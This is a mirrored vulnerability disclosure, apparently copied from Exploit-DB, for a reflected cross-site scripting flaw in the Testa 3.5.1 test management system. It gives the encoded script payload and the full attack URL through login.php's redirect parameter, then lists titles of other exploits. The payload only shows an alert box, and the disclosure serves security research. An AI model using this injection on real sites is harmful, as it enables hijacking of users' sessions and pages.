Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS)

Exploit Database
112 阅读

作者： Ashkan Moghaddas

日期： 2022-09-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51023/

# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link:
https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux

# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Add payload to the Tab, the XSS Payload:
%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- XSS has been triggered.

# Go to this url "
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
"
XSS will trigger.

last Exploits
Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS)的更多信息

CMSimple 4.4/4.4.2 – Remote File Inclusion：
WordPress Plugin NewsLetter Meenews 5.1 – ‘idnews’ Cross-Site Scripting：
WordPress Theme NexosReal Estate 1.7 – ‘search_order’ SQL Injection：
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 – ‘Add Admin’ Cross-Site Request Forgery (CSRF)：
MyBB KingChat Plugin – Persistent Cross-Site Scripting：
Net Gitar Shop 1.0 – Database Disclosure：
Oracle PeopleSoft – ‘PeopleSoftServiceListeningConnector’ XML External Entity via DOCTYPE：
Mantis Bug Tracker 1.3.10/2.3.0 – Cross-Site Request Forgery：